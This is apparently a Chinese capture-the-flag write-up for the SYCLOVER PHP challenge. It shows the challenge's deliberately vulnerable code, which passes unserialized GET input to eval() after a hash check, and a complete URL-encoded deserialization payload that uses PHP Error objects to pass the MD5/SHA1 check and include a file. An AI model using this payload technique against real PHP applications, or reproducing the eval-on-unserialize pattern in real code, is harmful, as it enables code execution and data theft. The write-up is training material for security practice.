进入靶场

审代码

<?php
// 关闭所有 PHP 错误报告，防止错误信息泄露可能的安全隐患
error_reporting(0);// 定义一个名为 SYCLOVER 的类
class SYCLOVER {// 定义类的公共属性 $sycpublic $syc;// 定义类的公共属性 $loverpublic $lover;// 定义魔术方法 __wakeup，当对象被反序列化时会自动调用该方法public function __wakeup(){// 检查 $syc 和 $lover 的值不相等，但它们的 MD5 哈希值和 SHA1 哈希值都相等// 利用了哈希算法碰撞的特性，在某些特殊输入下不同值可能产生相同的哈希结果if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc) === sha1($this->lover)) ){// 使用正则表达式检查 $syc 中是否包含 <?php、(、)、" 或 ' 这些字符if(!preg_match("/\<\?php|\(|\)|\"|\'/", $this->syc, $match)){// 如果 $syc 中不包含上述危险字符，则将 $syc 作为 PHP 代码进行执行eval($this->syc);} else {// 如果 $syc 中包含危险字符，终止程序并输出提示信息die("Try Hard !!");}}}
}// 检查是否通过 GET 请求传递了名为 'great' 的参数
if (isset($_GET['great'])){// 如果存在 'great' 参数，对其进行反序列化操作// 反序列化过程中会触发 SYCLOVER 类的 __wakeup 方法unserialize($_GET['great']);
} else {// 如果不存在 'great' 参数，高亮显示当前 PHP 文件的源代码highlight_file(__FILE__);
}?>

总结：通过 GET 请求传递名为 'great' 的参数，并对 'great' 参数进行序列化操作 

 $syc 和 $lover 的值不相等，但它们的 MD5 哈希值和 SHA1 哈希值都相等

正则表达式检查 $syc 

payload：

/?great=O%3A8%3A%22SYCLOVER%22%3A2%3A%7Bs%3A3%3A%22syc%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22%3F%3E%3C%3F%3Dinclude%7E%D0%99%93%9E%98%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A15%3A%22%2Fbox%2Fscript.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A13%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7Ds%3A5%3A%22lover%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22%3F%3E%3C%3F%3Dinclude%7E%D0%99%93%9E%98%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A15%3A%22%2Fbox%2Fscript.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A13%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7D%7D